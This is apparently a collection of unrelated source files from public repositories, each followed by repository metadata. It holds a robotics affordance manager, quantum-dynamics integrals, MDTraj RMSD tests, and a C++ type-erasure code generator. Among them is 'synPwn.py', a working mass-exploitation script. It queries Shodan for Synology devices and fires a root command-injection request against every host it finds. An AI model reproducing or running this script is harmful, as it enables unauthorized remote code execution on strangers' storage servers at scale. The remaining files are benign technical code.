def newAffordanceFromDescription(self, desc):
if 'uuid' not in desc:
desc['uuid'] = newUUID()
self.collection.updateDescription(desc)
return self.getAffordanceById(desc['uuid'])
def getAffordanceById(self, affordanceId):
for aff in self.getAffordances():
if self.getAffordanceId(aff) == affordanceId:
return aff
def getAffordanceDescription(self, aff):
return aff.getDescription()
def registerAffordance(self, aff, notify=True):
aff.connectRemovedFromObjectModel(self._onAffordanceRemovedFromObjectModel)
aff.properties.connectPropertyChanged(self._onAffordancePropertyChanged)
aff.getChildFrame().connectFrameModified(self._onAffordanceFrameChanged)
if notify:
self.notifyAffordanceUpdate(aff)
def removeAffordance(self, aff):
self.collection.removeDescription(aff.getProperty('uuid'), notify=False)
def notifyAffordanceUpdate(self, aff):
if not isinstance(aff, affordanceitems.AffordanceItem):
return
shouldNotify = not self._pendingUpdates and not self.timer.singleShotTimer.isActive()
self._pendingUpdates.add(aff)
if shouldNotify:
self._notifyPendingUpdates()
def _notifyPendingUpdates(self):
if self._pendingUpdates:
self.timer.singleShot(1.0/self.notifyFrequency)
for aff in self._pendingUpdates:
try:
self.collection.updateDescription(self.getAffordanceDescription(aff), notify=False)
except:
                print(traceback.format_exc())
self._pendingUpdates.clear()
def _onAffordancePropertyChanged(self, propertySet, propertyName):
if self._ignoreChanges:
return
self.notifyAffordanceUpdate(self.getAffordanceById(propertySet.getProperty('uuid')))
def _onAffordanceFrameChanged(self, frameObj):
if self._ignoreChanges:
return
aff = frameObj.parent()
self.notifyAffordanceUpdate(aff)
def _onAffordanceRemovedFromObjectModel(self, objectModel, aff):
if self._ignoreChanges:
return
self.removeAffordance(aff)
def _loadAffordanceFromDescription(self, desc):
className = desc['classname']
cls = getattr(affordanceitems, className)
aff = cls(desc['Name'], self.view)
om.addToObjectModel(aff, parentObj=om.getOrCreateContainer('affordances'))
vis.addChildFrame(aff)
aff.loadDescription(desc, copyMode=aff.COPY_MODE_ALL)
self.registerAffordance(aff, notify=False)
def _onDescriptionUpdated(self, collection, descriptionId):
aff = self.getAffordanceById(descriptionId)
desc = collection.getDescription(descriptionId)
if aff:
self._ignoreChanges = True
aff.loadDescription(desc, copyMode=aff.COPY_MODE_SKIP_LOCAL)
self._ignoreChanges = False
else:
aff = self._loadAffordanceFromDescription(desc)
def _onDescriptionRemoved(self, collection, descriptionId):
self._ignoreChanges = True
om.removeFromObjectModel(self.getAffordanceById(descriptionId))
self._ignoreChanges = False
|
gizatt/director
|
src/python/ddapp/affordancemanager.py
|
Python
|
bsd-3-clause
| 4,772
|
[
"VTK"
] |
156b6fad8da5542ef8768009b0a4b58e52bcc1dd798e35227d85d45059ddb2a6
|
#!/usr/bin/env python3
# Author: LukeBob
#
# Requires: argparse, shodan, requests; pip install them if needed.
# Run with: python3 synPwn.py --key <Shodan API Key> --cmd "<Command to try and execute>"
#
# python3 script for testing the (Synology StorageManager 5.2 - Root Remote Command Execution) exploit found by (Weibo: SecuriTeam_SSD, Twitter: @SecuriTeam_SSD)
# Uses the shodan library to find the targets running synology and runs specified command given in --cmd param
# use, "python3 synpwn.py" -h ,for more help
# For more information on the exploit visit: https://www.exploit-db.com/exploits/43190/
#
# Note: THIS SCRIPT CAN GET YOU IN A LOT OF TROUBLE, PROBABLY NOT WORTH THE HASSLE. ANYTHING YOU DO WITH THIS SCRIPT IS ON YOUR OWN BEHALF,
# AND YOURS ALONE!
#
# READ ^^^
import requests
import argparse
import shodan
parser = argparse.ArgumentParser(description="SynPwn, run remote code on Servers running 'Synology StorageManager 5.2'", epilog='Author: (Lukebob)')
parser.add_argument("--key", help='Shodan key')
parser.add_argument("--cmd", help='Command to run on system, if spaces in command wrap the command in quotes')
args = parser.parse_args()
## colors
class Color():
@staticmethod
def red(str):
return("\033[91m" + str + "\033[0m")
@staticmethod
def green(str):
return("\033[92m" + str + "\033[0m")
@staticmethod
def yellow(str):
return("\033[93m" + str + "\033[0m")
@staticmethod
def blue(str):
return("\033[94m" + str + "\033[0m")
## Creates New Shodan Api Object
def make_api(key):
try:
if len(key) > 1:
api = shodan.Shodan(key)
api.info()
else:
print(Color.red("[+] Error:")+" Please enter valid Api Key")
except shodan.exception.APIError as e:
print('[+] Error: %s' % e)
exit(0)
return(api)
## tries to run the command on the target
def exploit(target):
try:
url = ("http://{0}/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda'{1}''".format(target, args.cmd))
r=requests.get(url)
stat = r.status_code
return(stat)
except Exception as e:
print(Color.red("[+] Error: ")+" {0}".format(e))
pass
## iterates through targets, printing vulnerable/not vulnerable ip, hostname, country name
def search(api):
try:
results = api.search("Synology port:80")
except shodan.APIError as e:
print(Color.red("[+] Error: ")+"{0}".format(e))
exit(0)
for result in results['matches']:
country = result['location']['country_name']
hostname = result['hostnames']
target = result['ip_str']
result = exploit(target)
if result == "200":
print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, Color.red(args.cmd), Color.green("Vulnerable")))
elif result != "200":
print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, Color.red(args.cmd), Color.red("Not Vulnerable")))
def main():
if args.cmd and args.key:
api = make_api(args.key)
search(api)
else:
parser.print_help()
if __name__ == '__main__':
main()
|
LukeBob/bobstools-py
|
synpwn.py
|
Python
|
mit
| 3,694
|
[
"VisIt"
] |
a3cd57c23ded6be2a406b8d0095d8a23d38695539ca914da6006b1d16d0d372d
|
"""
Compute saddle-point integrals over trajectories traveling on adiabatic
potentials
This currently uses first-order saddle point.
"""
import numpy as np
import nomad.math.constants as constants
import nomad.core.glbl as glbl
import nomad.compiled.nuclear_gaussian_ccs as nuclear
# Let propagator know if we need data at centroids to propagate
require_centroids = False
# Determines the Hamiltonian symmetry
hermitian = True
# returns basis in which matrix elements are evaluated
basis = 'gaussian'
#cache previous values of theta, ensure continuity
theta_cache = dict()
# this is mostly to allow for consistent conventions: which
# diabat is the "excited" state, which is "ground" state.
gs = 0
es = 1
def elec_overlap(traj1, traj2):
"""Returns < Psi | Psi' >, the electronic overlap integral of two trajectories"""
return complex( np.dot(phi(traj1),phi(traj2)), 0.)
def nuc_overlap(traj1, traj2):
"""Returns < chi| chi' >, the nuclear overlap integral of two trajectories"""
return nuclear.overlap(traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
def traj_overlap(traj1, traj2):
"""Returns < chi| chi' >, the nuclear overlap integral of two trajectories"""
return elec_overlap(traj1, traj2) * nuc_overlap(traj1, traj2)
def s_integral(traj1, traj2, nuc_ovrlp, elec_ovrlp):
"""Returns < Psi | Psi' >, the overlap of the nuclear
component of the wave function only"""
return nuc_ovrlp * elec_ovrlp
def t_integral(traj1, traj2, kecoef, nuc_ovrlp, elec_ovrlp):
"""Returns kinetic energy integral over trajectories."""
# evaluate just the nuclear component (for re-use)
# < chi | del^2 / dx^2 | chi'>
ke = nuclear.deld2x(nuc_ovrlp,traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
return -np.dot(kecoef,ke) * elec_ovrlp
def sdot_integral(traj1, traj2, nuc_ovrlp, elec_ovrlp):
"""Returns kinetic energy integral over trajectories."""
# evaluate just the nuclear component (for re-use)
# < chi | d / dx | chi'>
deldx = nuclear.deldx(nuc_ovrlp,traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
# < chi | d / dp | chi'>
deldp = nuclear.deldp(nuc_ovrlp,traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
# the nuclear contribution to the sdot matrix
sdot = ( np.dot(deldx, traj2.velocity())
+ np.dot(deldp, traj2.force())) * elec_ovrlp
phi1 = phi(traj1)
dphi2 = dphi(traj2)
# the derivative coupling
deriv_coup = np.array([np.dot(phi1, dphi2[:,q]) for q in range(traj2.dim)])
e_coup = np.dot(deriv_coup, traj2.velocity()) * nuc_ovrlp
return sdot + e_coup
def rot_mat(theta):
"""Returns the adiabatic-diabatic rotation matrix for a given value of
theta"""
global gs, es
if gs == 0:
return np.array([[ np.cos(theta), -np.sin(theta)],
[ np.sin(theta), np.cos(theta)]])
else:
return np.array([[-np.sin(theta), np.cos(theta)],
[ np.cos(theta), np.sin(theta)]])
def drot_mat(theta):
"""Returns the derivative adiabatic-diabatic rotation matrix with respect
to theta"""
global gs, es
if gs == 0:
return np.array([[-np.sin(theta), -np.cos(theta)],
[ np.cos(theta), -np.sin(theta)]])
else:
return np.array([[-np.cos(theta), -np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
def theta(traj):
"""Returns to the adiabatic-diabatic rotation angle theta.
Choose theta to be consistent with diabatic-adiabatic transformation
matrix, which itself is chosen to have a phase resulting in a slowly
varying value of of theta.
"""
global theta_cache, gs, es
# can also run the trivial case of a single state
if traj.nstates == 1:
return 0.
hmat = traj.pes.get_data('diabat_pot')
h12 = hmat[0,1]
de = hmat[es,es]-hmat[gs,gs]
if abs(de) < constants.fpzero:
sgn = np.sign(de)
if sgn == 0.:
sgn = 1
de = sgn * constants.fpzero
ang = 0.5*np.arctan2(2.*h12,de)
# check the cached value and shift if necessary.
pi_mult = [0,-1.,1.]
# if not in cache, return current value
if traj.label in theta_cache:
dif_vec = [abs(ang + pi_mult[i]*np.pi - theta_cache[traj.label])
for i in range(len(pi_mult))]
shft = dif_vec.index(min(dif_vec))
if shft != 0:
ang += pi_mult[shft]*np.pi
theta_cache[traj.label] = ang
#print("traj="+str(traj.label)+" theta="+str(ang)+"\n")
return ang
def dtheta(traj):
"""Returns to the derivative adiabatic-diabatic rotation angle theta with
respect to the internal coordinates."""
global gs, es
# can also run the trivial case of a single state
if traj.nstates == 1:
return np.zeros((traj.dim), dtype=float)
hmat = traj.pes.get_data('diabat_pot')
dhmat = traj.pes.get_data('diabat_deriv')
h12 = hmat[0,1]
de = hmat[es,es] - hmat[gs,gs]
if abs(de) < constants.fpzero:
sgn = np.sign(de)
if sgn == 0.:
sgn = 1
de = sgn * constants.fpzero
arg = 2. * h12 / de
if abs(arg) < constants.fpzero:
sgn = np.sign(arg)
if sgn == 0.:
sgn = 1
arg = sgn * constants.fpzero
dtheta_dq = np.array([((dhmat[q,0,1]*de - h12*(dhmat[q,es,es]-dhmat[q,gs,gs]))/de**2)/(1+arg**2)
for q in range(traj.dim)])
return dtheta_dq
def phi(traj):
"""Returns the transformation matrix using the rotation angle.
    Should be identical to the dat_mat in the vibronic interface"""
# can also run the trivial case of a single state
if traj.nstates == 1:
return np.array([1.], dtype=float)
angle = theta(traj)
phi_mat = rot_mat(angle)
return phi_mat[:,traj.state]
def dphi(traj):
"""Returns the derivative transformation matrix using the rotation angle."""
# can also run the trivial case of a single state
if traj.nstates == 1:
return np.zeros(traj.dim, dtype=float)
angle = theta(traj)
dangle = dtheta(traj)
dphi_mat = drot_mat(angle)
dphi_dq = np.array([dphi_mat[i,traj.state]*dangle for i in range(traj.nstates)])
return dphi_dq
|
mschuurman/FMSpy
|
nomad/integrals/mca.py
|
Python
|
lgpl-3.0
| 6,533
|
[
"Gaussian"
] |
c021577aae4f94e8f9f2db48769fdf0d8ac43ab9aee9942844c719313910331d
|
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import mdtraj as md
import numpy as np
from mdtraj.geometry.alignment import rmsd_qcp, compute_average_structure
from mdtraj.testing import eq
np.random.seed(52)
def test_trajectory_rmsd(get_fn):
t = md.load(get_fn('traj.h5'))
for parallel in [True, False]:
calculated = md.rmsd(t, t, 0, parallel=parallel)
reference = np.zeros(t.n_frames)
for i in range(t.n_frames):
reference[i] = rmsd_qcp(t.xyz[0], t.xyz[i])
eq(calculated, reference, decimal=3)
def test_precentered_1(get_fn):
# test rmsd against the numpy version, using the same trajectory
# as target and reference
t1 = md.load(get_fn('traj.h5'), stride=10)
t2 = md.load(get_fn('traj.h5'), stride=10)
# don't center t1, and use it without precentered
# explicitly center t2, and use *with* precentered
for parallel in [True, False]:
t2.center_coordinates()
eq(t1.n_frames, t2.n_frames)
for i in range(t1.n_frames):
ref = np.zeros(t1.n_frames)
for j in range(t1.n_frames):
ref[j] = rmsd_qcp(t1.xyz[j], t1.xyz[i])
val1 = md.rmsd(t1, t1, i, parallel=parallel, precentered=False)
val2 = md.rmsd(t2, t2, i, parallel=parallel, precentered=True)
eq(ref, val1, decimal=3)
eq(val1, val2)
def test_precentered_2(get_fn):
# test rmsd against the numpy version, using the difference
# trajectories as target and reference
t1_a = md.load(get_fn('traj.h5'), stride=10)
t2_a = md.load(get_fn('traj.h5'), stride=10)
t1_b = md.load(get_fn('traj.h5'), stride=10)
t2_b = md.load(get_fn('traj.h5'), stride=10)
# don't center t1, and use it without precentered
# explicitly center t2, and use *with* precentered
t2_a.center_coordinates()
t2_b.center_coordinates()
for parallel in [True, False]:
for i in range(t1_b.n_frames):
ref = np.zeros(t1_a.n_frames)
for j in range(t1_a.n_frames):
ref[j] = rmsd_qcp(t1_a.xyz[j], t1_b.xyz[i])
val1 = md.rmsd(t1_a, t1_b, i, parallel=parallel, precentered=False)
val2 = md.rmsd(t2_a, t2_b, i, parallel=parallel, precentered=True)
eq(ref, val1, decimal=3)
eq(val1, val2, decimal=4)
def test_superpose_0(get_fn):
t1 = md.load(get_fn('traj.h5'))
reference_rmsd = md.rmsd(t1, t1, 0)
t1.superpose(t1, 0)
displ_rmsd = np.zeros(t1.n_frames)
for i in range(t1.n_frames):
delta = t1.xyz[i] - t1.xyz[0]
displ_rmsd[i] = (delta ** 2.0).sum(1).mean() ** 0.5
eq(reference_rmsd, displ_rmsd, decimal=5)
def test_superpose_1():
# make one frame far from the origin
reference = md.Trajectory(xyz=np.random.randn(1, 100, 3) + 100, topology=None)
reference_xyz = reference.xyz.copy()
for indices in [None, np.arange(90)]:
# make another trajectory in a similar rotational state
query = md.Trajectory(xyz=reference.xyz + 0.01 * np.random.randn(*reference.xyz.shape), topology=None)
query.superpose(reference, 0, atom_indices=indices)
assert eq(reference.xyz, reference_xyz)
new_centers = np.mean(query.xyz[0], axis=1)
assert 80 < new_centers[0] < 120
assert 80 < new_centers[1] < 120
assert 80 < new_centers[2] < 120
def test_superpose_2():
t1 = md.Trajectory(xyz=np.random.randn(1, 100, 3) + 100, topology=None)
t2 = md.Trajectory(xyz=np.random.randn(1, 100, 3) + 100, topology=None)
t2_copy = t2.xyz.copy()
t1.superpose(t2)
t1.superpose(t2, atom_indices=[1, 2, 3, 4, 5, 6, 7])
# make sure that superposing doesn't alter the reference traj
eq(t2.xyz, t2_copy)
def test_superpose_refinds():
# make one frame far from the origin
normal = np.random.randn(1, 100, 3)
normal_xyz = normal.copy()
flipped = np.zeros_like(normal)
flipped[:, :50, :] = normal[:, 50:, :]
flipped[:, 50:, :] = normal[:, :50, :]
flipped_xyz = flipped.copy()
normal = md.Trajectory(xyz=normal, topology=None)
flipped = md.Trajectory(xyz=flipped, topology=None)
normal.superpose(flipped, atom_indices=np.arange(0, 50), ref_atom_indices=np.arange(50, 100))
eq(normal.xyz, normal_xyz)
flipped.superpose(normal, atom_indices=np.arange(50, 100), ref_atom_indices=np.arange(0, 50))
eq(flipped.xyz, flipped_xyz)
normal.superpose(flipped)
assert not np.allclose(normal.xyz, normal_xyz)
def test_rmsd_atom_indices(get_fn):
native = md.load(get_fn('native.pdb'))
t1 = md.load(get_fn('traj.h5'))
atom_indices = np.arange(10)
dist1 = md.rmsd(t1, native, atom_indices=atom_indices)
t2 = md.load(get_fn('traj.h5'))
t2.restrict_atoms(atom_indices)
native.restrict_atoms(atom_indices)
dist2 = md.rmsd(t2, native)
eq(dist1, dist2)
def test_rmsd_ref_ainds(get_fn):
native = md.load(get_fn('native.pdb'))
t1 = md.load(get_fn('traj.h5'))
atom_indices = np.arange(10)
dist1 = md.rmsd(t1, native, atom_indices=atom_indices,
ref_atom_indices=atom_indices)
bad_atom_indices = np.arange(10, 20)
t2 = md.load(get_fn('traj.h5'))
dist2 = md.rmsd(t2, native, atom_indices=atom_indices,
ref_atom_indices=bad_atom_indices)
assert np.all(dist2 > dist1)
def test_average_structure(get_fn):
traj = md.load(get_fn('frame0.dcd'), top=get_fn('frame0.pdb'))
average = compute_average_structure(traj.xyz)
# The mean RMSD to the average structure should be less than to any individual frame.
sum1 = 0
sum2 = 0
for i in range(traj.n_frames):
sum1 += rmsd_qcp(traj.xyz[0], traj.xyz[i])
sum2 += rmsd_qcp(average, traj.xyz[i])
assert sum2 < sum1
|
leeping/mdtraj
|
tests/test_rmsd.py
|
Python
|
lgpl-2.1
| 6,778
|
[
"MDTraj"
] |
0d84fef93e5ea6c2a903a316d855bf097d7f0072dacaffdd96fc5760e78cc3ed
|
#!/usr/bin/env python
import clang
from clang.cindex import Index
import argparse
import os
import re
import sys
indent_spaces = 4
indentation = ' ' * indent_spaces
output = ['']
class client_data:
def __init__(self):
self.tu = None
self.current_namespaces = [] # cursors
self.current_struct = null_cursor
self.current_struct_prefix = ''
# function signature, forwarding call arguments, optional return
# keyword, function name, and "const"/"" for function constness
self.member_functions = [] # each element [''] * 5
self.printed_headers = False
self.filename = ''
self.include_guarded = False
self.form = ''
self.form_lines = []
self.headers = ''
self.copy_on_write = False
def get_tokens (tu, cursor):
return [x for x in tu.get_tokens(extent=cursor.extent)]
def print_tokens (tu, cursor, tokens_from_include_directive):
tokens = get_tokens(tu, cursor)
open_angle = '<'
open_angle_seen = False
for token in tokens:
spelling = token.spelling
if not open_angle_seen:
output[0] += ' '
output[0] += spelling
        if spelling == open_angle:
open_angle_seen = True
output[0] += '\n'
def struct_kind (kind):
if kind == clang.cindex.CursorKind.CLASS_DECL or \
kind == clang.cindex.CursorKind.STRUCT_DECL or \
kind == clang.cindex.CursorKind.CLASS_TEMPLATE or \
kind == clang.cindex.CursorKind.CLASS_TEMPLATE_PARTIAL_SPECIALIZATION:
return True
else:
return False
def indent (offset=0):
size = len(data.current_namespaces) + offset
return ' ' * (size * indent_spaces)
def print_lines (lines):
for line in lines:
if line != '':
            output[0] += indent() + indentation + line + '\n'
else:
output[0] += '\n'
def print_headers ():
if data.printed_headers:
return
output[0] += data.headers + '\n'
data.printed_headers = True
def struct_prefix (struct_cursor):
retval = ''
tokens = get_tokens(data.tu, struct_cursor)
open_brace = '{'
struct_ = 'struct'
class_ = 'class'
for i in range(len(tokens)):
spelling = tokens[i].spelling
if spelling == open_brace:
break
if spelling == struct_ or spelling == class_:
retval += '\n' + indent(-1)
elif i:
retval += ' '
retval += spelling
return retval
def member_params (cursor):
tokens = get_tokens(data.tu, cursor)
open_brace = '{'
semicolon = ';'
close_paren = ')'
const_token = 'const'
comma = ','
str = ''
constness = ''
identifier_regex = re.compile(r'[_a-zA-Z][_a-zA-Z0-9]*')
probably_args = []
close_paren_seen = False
for i in range(len(tokens)):
spelling = tokens[i].spelling
if identifier_regex.match(spelling) and i < len(tokens) - 1 and (tokens[i + 1].spelling == comma or tokens[i + 1].spelling == close_paren):
probably_args.append(spelling)
if close_paren_seen and spelling == const_token:
constness = 'const'
if spelling == close_paren:
close_paren_seen = True
if spelling == open_brace or spelling == semicolon:
break
if i:
str += ' '
str += spelling
args = [x for x in cursor.get_arguments()]
args_str = ''
function_name = cursor.spelling
for i in range(len(args)):
arg_cursor = args[i]
# Sometimes, libclang gets confused. When it does, try our best to
# figure out the parameter names anyway.
if arg_cursor.spelling == '':
args_str = ', '.join(probably_args)
            sys.stderr.write(
'''An error has occurred in determining the name of parameter {} of function
{}. This usually occurs when libclang can't figure out the type of the
parameter (often due to a typo or missing include somewhere). We're using
these possibly-wrong, heuristically-determined parameter names instead:
'{}'.\n'''.format(i, function_name, args_str))
break
if i:
args_str += ', '
args_str += arg_cursor.spelling
return_str = cursor.result_type.kind != clang.cindex.TypeKind.VOID and 'return ' or ''
return [str, args_str, return_str, function_name, constness]
def indent_lines (lines):
regex = re.compile(r'\n')
indentation = indent()
return regex.sub('\n' + indentation, indentation + lines)
def find_expansion_lines (lines):
retval = [0] * 3
for i in range(len(lines)):
line = lines[i]
try:
nonvirtual_pos = line.index('{nonvirtual_members}')
except:
nonvirtual_pos = -1
try:
pure_virtual_pos = line.index('{pure_virtual_members}')
except:
pure_virtual_pos = -1
try:
virtual_pos = line.index('{virtual_members}')
except:
virtual_pos = -1
if nonvirtual_pos != -1:
retval[0] = (i, nonvirtual_pos)
elif pure_virtual_pos != -1:
retval[1] = (i, pure_virtual_pos)
elif virtual_pos != -1:
retval[2] = (i, virtual_pos)
return retval
def close_struct ():
lines = data.form_lines
expansion_lines = find_expansion_lines(lines)
    lines = [
        line.format(
            struct_prefix=data.current_struct_prefix,
            struct_name=data.current_struct.spelling,
            nonvirtual_members='{nonvirtual_members}',
            pure_virtual_members='{pure_virtual_members}',
            virtual_members='{virtual_members}'
        )
        for line in lines
    ]
nonvirtual_members = ''
pure_virtual_members = ''
virtual_members = ''
for function in data.member_functions:
if data.copy_on_write:
nonvirtual_members += \
indentation + function[0] + '\n' + \
indentation + '{ assert(handle_); ' + function[2] + \
(function[4] == 'const' and 'read().' or 'write().') + \
function[3] + '(' + function[1] + ' ); }\n'
else:
nonvirtual_members += \
indentation + function[0] + '\n' + \
indentation + '{ assert(handle_); ' + function[2] + \
'handle_->' + function[3] + \
'(' + function[1] + ' ); }\n'
pure_virtual_members += \
indentation * 2 + 'virtual ' + function[0] + ' = 0;\n'
virtual_members += \
indentation * 2 + 'virtual ' + function[0] + '\n' + \
indentation * 2 + '{ ' + function[2] + \
'value_.' + function[3] + \
'(' + function[1] + ' ); }\n'
nonvirtual_members = nonvirtual_members[:-1]
pure_virtual_members = pure_virtual_members[:-1]
virtual_members = virtual_members[:-1]
lines[expansion_lines[0][0]] = nonvirtual_members
lines[expansion_lines[1][0]] = pure_virtual_members
lines[expansion_lines[2][0]] = virtual_members
output[0] += '\n'
for line in lines:
output[0] += indent_lines(line) + '\n'
def open_namespace (namespace_):
output[0] += '\n' + indent() + 'namespace ' + namespace_.spelling + ' {'
def close_namespace ():
output[0] += '\n' + indent() + '}\n'
class child_visit:
Break = 0
Continue = 1
Recurse = 2
def visit_impl (cursor, parent):
# close open namespaces we have left
enclosing_namespace = parent
while enclosing_namespace != data.tu.cursor and \
enclosing_namespace.kind != clang.cindex.CursorKind.NAMESPACE:
enclosing_namespace = enclosing_namespace.semantic_parent
if enclosing_namespace != data.tu.cursor and \
enclosing_namespace.kind == clang.cindex.CursorKind.NAMESPACE:
while len(data.current_namespaces) and \
enclosing_namespace != data.current_namespaces[-1]:
data.current_namespaces.pop()
close_namespace()
# close open struct if we have left it
enclosing_struct = parent
while enclosing_struct and \
enclosing_struct != data.tu.cursor and \
not struct_kind(enclosing_struct.kind):
enclosing_struct = enclosing_struct.semantic_parent
if enclosing_struct and \
data.current_struct != null_cursor and \
enclosing_struct != data.current_struct:
close_struct()
data.current_struct = null_cursor
data.member_functions = []
location = cursor.location
from_main_file_ = from_main_file(location)
kind = cursor.kind
if kind == clang.cindex.CursorKind.NAMESPACE:
if from_main_file_:
print_headers()
open_namespace(cursor)
data.current_namespaces.append(cursor)
return child_visit.Recurse
elif not from_main_file_:
return child_visit.Continue
elif struct_kind(kind):
if data.current_struct == null_cursor:
print_headers()
data.current_struct = cursor
data.current_struct_prefix = struct_prefix(cursor)
return child_visit.Recurse
elif kind == clang.cindex.CursorKind.CXX_METHOD:
data.member_functions.append(member_params(cursor))
return child_visit.Continue
def visit (cursor, parent=None):
for child in cursor.get_children():
result = visit_impl(child, cursor)
if result == child_visit.Recurse:
if visit(child, cursor) == child_visit.Break:
return child_visit.Break
elif result == child_visit.Break:
return child_visit.Break
elif result == child_visit.Continue:
continue
manual = '''emtypen Users' Manual
emtypen generates type erasure C++ code. It does this to automate much of the
drudgery of creating such types by hand.
Some of this might not make sense if you don't know how type erasure works.
See http://tzlaine.github.io/type_erasure if this is the case.
At the highest level of abstraction, emtypen takes three input files
containing code and generates a single output source file. It uses libclang,
a wrapper around the Clang front end, to do this.
The three input files are the "archetype" file, the "form" file, and the
"header" file. The archetype must always be specified. There are implicit
defaults for the form and header.
The Archetype File
The archetype file contains one or more structs, struct templates, classes
and/or class templates (hereafter generically referred to just as
"archetypes"). Archetypes that are templates produce generated types
("erased types" hereafter) that are also templates.
Each archetype defines the public API that the erased type requires of all the
types that it can hold. The erased type will also contain all the
contructors, assignment operators and other operators defined in the form
provided. It is an error to define any of these fundamental operations in the
archetype; they go in the form instead. Here is an example archetype file:
#ifndef LOGGABLE_INTERFACE_INCLUDED__
#define LOGGABLE_INTERFACE_INCLUDED__
#include <iostream>
struct loggable
{
std::ostream & log (std::ostream & os) const;
};
#endif
Note that this is a complete and valid C++ header. You can syntax check it
with your favorite compiler if you like. emtypen will preserve the include
guard, if any, include directives, if any, and the namespaces in which the
archetypes are declared, if any.
IMPORTANT: Give each function parameter a name. If the parameters in an
archetype's functions are left unnamed, the generated forwarding functions
will be malformed.
Due to libclang limitations, macros and comments are not preserved.
Declarations other than the ones listed above are not preserved (for instance,
function declarations).
The Form File
The form file contains a template-like form that gets filled in with
repetitive code generated from an archetype. The form will be repeated in the
output once for each archetype.
There are certain magic strings in the form that are replaced with generated
code. If you want to create a new form or modify an existing one, you need to
include:
%struct_prefix% - This is replaced with the tokens that introduce the
archetype by name, along with "struct", "class", "template <...>" etc.
%struct_name% - This is replaced with only the archetype's name.
%nonvirtual_members% - This is the generated portion of the API of the erased
type. It is replaced with a version of the functions in the archetype that
forwards each call to the virtual functions in the handle object.
%pure_virtual_members% - This is the generated portion of the API of the
handle base class. It is replaced with pure virtual declarations of the
functions in the archetype.
%virtual_members% - This is the generated portion of the API of the derived
handle class. It is replaced with virtual function definitions of the
functions in the archetype that forward to the underlying held value.
Within the constraints implied by the pattern of code generation outlined
above, the form can include anything you like.
However, the forwarding function code generation needs to know if your form
uses copy-on-write in order to perform the copy on mutating function calls.
If you specify on the command line that emtypen should generate code usable
with a copy-on-write form (see emtypen --help for details), the generated code
will rely on two functions that must be in the form: read() and write(). They
must return const and non-const references respectively to the underlying
handle. They may be public or private. read() will be called in every const
member function in the archetype's API, and write() will be called in every
non-const member function.
The Header file
The header file should contain all headers, macros, forward declarations,
etc. required by the code in the form. Headers required by the code in an
archetype file should be included there, not in the header file.
Command Line Options
An alternate form file and/or header file can be specified on the command
line. Also, you will probably need to generate slightly different code for
forms that use copy-on-write. See emtypen --help for details.
'''
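# Illustrative sketch (hypothetical, not a form shipped with emtypen): a
# skeletal form using the magic strings described in the manual above. A
# real form would also define constructors, assignment operators and, for
# copy-on-write use, the read()/write() helpers.
#
#   %struct_prefix%
#   {
#   public:
#       %nonvirtual_members%
#   private:
#       struct handle_base
#       {
#           virtual ~handle_base () {}
#           %pure_virtual_members%
#       };
#       template <typename T>
#       struct handle : handle_base
#       {
#           handle (T value) : value_ (std::move(value)) {}
#           %virtual_members%
#           T value_;
#       };
#       handle_base * handle_;
#   };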
def prepare_form_impl (form):
form = form.replace('{', '{{')
form = form.replace('}', '}}')
regex = re.compile(r'%(\w+)%')
return regex.sub(r'{\1}', form)[:-1]
def prepare_form (form):
if type(form) == str:
return prepare_form_impl(form)
else:
for i in range(len(form)):
form[i] = prepare_form_impl(form[i])
return form
def print_diagnostic(diag):
severities = ['ignored', 'note', 'warning', 'error', 'fatal error']
file_ = diag.location.file
line = diag.location.line
column = diag.location.column
severity = severities[diag.severity]
spelling = diag.spelling
    sys.stderr.write('{file_}:{line}:{column} {severity}: {spelling}\n'.format(**locals()))
# main
if '--manual' in sys.argv:
    print(manual)
exit(0)
parser = argparse.ArgumentParser(description='Generates type erased C++ code.')
parser.add_argument('--form', type=str, required=True, help='form used to generate code')
parser.add_argument('--headers', type=str, required=False, help='file containing headers to prepend to the generated code')
parser.add_argument('--copy-on-write', type=str, required=False, help='generate code suitable for a COW implementation')
parser.add_argument('--out-file', type=str, required=False, help='write output to given file')
parser.add_argument('--clang-path', type=str, required=False, help='path to libclang library')
parser.add_argument('--manual', action='store_true', required=False, help='print a much longer manual to the terminal')
parser.add_argument('file', type=str, help='the input file containing archetypes')
parser.add_argument('clang_args', metavar='Clang-arg', type=str, nargs=argparse.REMAINDER,
help='additional args to pass to Clang')
args = parser.parse_args()
if args.clang_path:
clang.cindex.Config.set_library_path(args.clang_path)
null_cursor = clang.cindex.conf.lib.clang_getNullCursor()
from_main_file = clang.cindex.conf.lib.clang_Location_isFromMainFile
data = client_data()
data.form = prepare_form(open(args.form).read())
data.form_lines = prepare_form(open(args.form).readlines())
data.headers = args.headers and open(args.headers).read() or ''
include_guarded = False
archetypes = open(args.file).read()
archetypes_lines = open(args.file).readlines()
guard_regex = re.compile(r'#ifndef\s+([^\s]+)[^\n]*\n#define\s+\1')
match = guard_regex.search(archetypes)
if match and match.start() == archetypes.index('#'):
include_guarded = True
output[0] += '''#ifndef {0}
#define {0}
'''.format(match.group(1))
all_clang_args = [args.file]
all_clang_args.extend(args.clang_args)
index = Index.create()
